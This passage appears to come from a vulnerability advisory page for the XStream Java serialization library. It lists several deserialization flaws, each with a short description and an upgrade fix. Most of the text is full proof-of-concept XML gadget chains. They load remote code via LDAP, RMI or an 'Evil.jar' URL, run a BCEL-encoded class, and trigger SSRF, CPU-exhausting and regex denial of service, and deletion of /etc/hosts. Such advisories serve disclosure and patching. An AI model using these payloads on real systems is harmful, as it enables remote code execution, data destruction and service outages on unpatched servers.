                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>long</type>
                              <field>
                                <name>serialVersionUID</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[C</type>
                              <field>
                                <name>value</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>int</type>
                              <field reference='../../../../../val_-getter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                        </propertySetters>
                        <propertyGetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>java.util.Comparator</type>
                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>long</type>
                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[C</type>
                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
                          </entry>
                        </propertyGetters>
                        <elementLocalNameCollision>false</elementLocalNameCollision>
                        <contentClass>java.lang.String</contentClass>
                        <elementDeclaredTypes/>
                      </outer-class>
                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                  </accessors>
                  <wrapper>java.lang.Object</wrapper>
                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
                  <dynamicWrapper>false</dynamicWrapper>
                </bodyBuilder>
                <isOneWay>false</isOneWay>
              </com.sun.xml.internal.ws.client.sei.StubHandler>
            </entry>
          </stubHandlers>
          <clientConfig>false</clientConfig>
        </databinding>
        <methodHandlers>
          <entry>
            <method reference='../../../databinding/stubHandlers/entry/method'/>
            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
              <owner reference='../../../..'/>
              <method reference='../../../../databinding/stubHandlers/entry/method'/>
              <isVoid>false</isVoid>
              <isOneway>false</isOneway>
            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
          </entry>
        </methodHandlers>
      </handler>
    </dynamic-proxy>
    <string>ldap://ip:1389/#evil</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.

PoC

<!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: -->

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
              <soapPart/>
              <mm>
                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                      <names>
                        <string>aa</string>
                        <string>aa</string>
                      </names>
                      <ctx>
                        <environment/>
                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                          <java.rmi.server.RemoteObject>
                            <string>UnicastRef</string>
                            <string>ip2</string>
                            <int>1099</int>
                            <long>0</long>
                            <int>0</int>
                            <short>0</short>
                            <boolean>false</boolean>
                          </java.rmi.server.RemoteObject>
                        </registry>
                        <host>ip2</host>
                        <port>1099</port>
                      </ctx>
                    </candidates>
                  </aliases>
                </it>
              </mm>
            </multiPart>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.17 or higher.

[,1.4.17)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='javax.activation.URLDataSource'>
                <url>http://localhost:8080/internal/:</url>
              </dataSource>
            </message>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>
                <configs class='sun.misc.FIFOQueueEnumerator'>
                  <queue>
                    <length>1</length>
                    <head>
                      <obj class='url'>http://localhost:8080/internal/</obj>
                    </head>
                    <tail reference='../head'/>
                  </queue>
                  <cursor reference='../queue/head'/>
                </configs>
                <returned class='sorted-set'/>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • H
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <is class='java.io.ByteArrayInputStream'>
            <buf></buf>
            <pos>-2147483648</pos>
            <mark>0</mark>
            <count>0</count>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                      <outer-class reference='../..'/>
                    </key>
                  </defaultDomain>
                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
        <default>
          <loadFactor>0.75</loadFactor>
          <threshold>525</threshold>
        </default>
        <int>700</int>
        <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
        <default>
          <defaultLocale>zh_CN</defaultLocale>
          <resourceCache/>
        </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
        <default>
          <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <sun.swing.SwingLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>
                  </args>
                </sun.swing.SwingLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
          </tables>
        </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>Evil</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='java.net.URLClassLoader'>
                  <ucp class='sun.misc.URLClassPath'>
                    <urls serialization='custom'>
                      <unserializable-parents/>
                      <vector>
                        <default>
                          <capacityIncrement>0</capacityIncrement>
                          <elementCount>1</elementCount>
                          <elementData>
                            <url>http://127.0.0.1:80/Evil.jar</url>
                          </elementData>
                        </default>
                      </vector>
                    </urls>
                    <path>
                      <url>http://127.0.0.1:80/Evil.jar</url>
                    </path>
                    <loaders/>
                    <lmap/>
                  </ucp>
                  <package2certs class='concurrent-hash-map'/>
                  <classes/>
                  <defaultDomain>
                    <classloader class='java.net.URLClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                      <outer-class reference='../..'/>
                    </key>
                  </defaultDomain>
                  <initialized>true</initialized>
                  <pdcache/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>-2147483648</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • C
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
      <m__DTMXRTreeFrag>
        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
          <m__size>-10086</m__size>
          <m__mgrDefault>
            <__overrideDefaultParser>false</__overrideDefaultParser>
            <m__incremental>false</m__incremental>
            <m__source__location>false</m__source__location>
            <m__dtms>
              <null/>
            </m__dtms>
            <m__defaultHandler/>
          </m__mgrDefault>
          <m__shouldStripWS>false</m__shouldStripWS>
          <m__indexing>false</m__indexing>
          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
              <javax.sql.rowset.BaseRowSet>
                <default>
                  <concurrency>1008</concurrency>
                  <escapeProcessing>true</escapeProcessing>
                  <fetchDir>1000</fetchDir>
                  <fetchSize>0</fetchSize>
                  <isolation>2</isolation>
                  <maxFieldSize>0</maxFieldSize>
                  <maxRows>0</maxRows>
                  <queryTimeout>0</queryTimeout>
                  <readOnly>true</readOnly>
                  <rowSetType>1004</rowSetType>
                  <showDeleted>false</showDeleted>
                  <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
                  <listeners/>
                  <params/>
                </default>
              </javax.sql.rowset.BaseRowSet>
              <com.sun.rowset.JdbcRowSetImpl>
                <default/>
              </com.sun.rowset.JdbcRowSetImpl>
            </fPullParserConfig>
            <fConfigSetInput>
              <class>com.sun.rowset.JdbcRowSetImpl</class>
              <name>setAutoCommit</name>
              <parameter-types>
                <class>boolean</class>
              </parameter-types>
            </fConfigSetInput>
            <fConfigParse reference='../fConfigSetInput'/>
            <fParseInProgress>false</fParseInProgress>
          </m__incrementalSAXSource>
          <m__walker>
            <nextIsRaw>false</nextIsRaw>
          </m__walker>
          <m__endDocumentOccured>false</m__endDocumentOccured>
          <m__idAttributes/>
          <m__textPendingStart>-1</m__textPendingStart>
          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
          <m__pastFirstElement>false</m__pastFirstElement>
        </m__dtm>
        <m__dtmIdentity>1</m__dtmIdentity>
      </m__DTMXRTreeFrag>
      <m__dtmRoot>1</m__dtmRoot>
      <m__allowRelease>false</m__allowRelease>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='java.util.Scanner'>
                <buf class='java.nio.HeapCharBuffer'>
                  <mark>-1</mark>
                  <position>0</position>
                  <limit>0</limit>
                  <capacity>1024</capacity>
                  <address>0</address>
                  <hb></hb>
                  <offset>0</offset>
                  <isReadOnly>false</isReadOnly>
                </buf>
                <position>0</position>
                <matcher>
                  <parentPattern>
                    <pattern>\p{javaWhitespace}+</pattern>
                    <flags>0</flags>
                  </parentPattern>
                  <from>0</from>
                  <to>0</to>
                  <lookbehindTo>0</lookbehindTo>
                  <text class='java.nio.HeapCharBuffer' reference='../../buf'/>
                  <acceptMode>0</acceptMode>
                  <first>-1</first>
                  <last>0</last>
                  <oldLast>-1</oldLast>
                  <lastAppendPosition>0</lastAppendPosition>
                  <locals/>
                  <hitEnd>false</hitEnd>
                  <requireEnd>false</requireEnd>
                  <transparentBounds>true</transparentBounds>
                  <anchoringBounds>false</anchoringBounds>
                </matcher>
                <delimPattern>
                  <pattern>(x+)*y</pattern>
                  <flags>0</flags>
                </delimPattern>
                <hasNextPosition>0</hasNextPosition>
                <source class='java.io.StringReader'>
                  <lock class='java.io.StringReader' reference='..'/>
                  <str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>
                  <length>32</length>
                  <next>0</next>
                  <mark>0</mark>
                </source>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>
                <part>
                  <dataHead>
                    <tail/>
                    <head>
                      <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>
                        <len>3</len>
                        <data>AQID</data>
                      </data>
                    </head>
                  </dataHead>
                  <contentTransferEncoding>base64</contentTransferEncoding>
                  <msg>
                    <it class='java.util.ArrayList$Itr'>
                      <cursor>0</cursor>
                      <lastRet>1</lastRet>
                      <expectedModCount>4</expectedModCount>
                        <outer-class>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
                        </outer-class>
                    </it>
                    <in class='java.io.FileInputStream'>
                      <fd/>
                      <channel class='sun.nio.ch.FileChannelImpl'>
                        <closeLock/>
                        <open>true</open>
                        <threads>
                          <used>-1</used>
                        </threads>
                        <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>
                          <sockClient>
                            <fileName>/etc/hosts</fileName>
                            <unlinkFile>true</unlinkFile>
                          </sockClient>
                          <connectionSync/>
                        </parent>
                      </channel>
                      <closeLock/>
                    </in>
                  </msg>
                </part>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
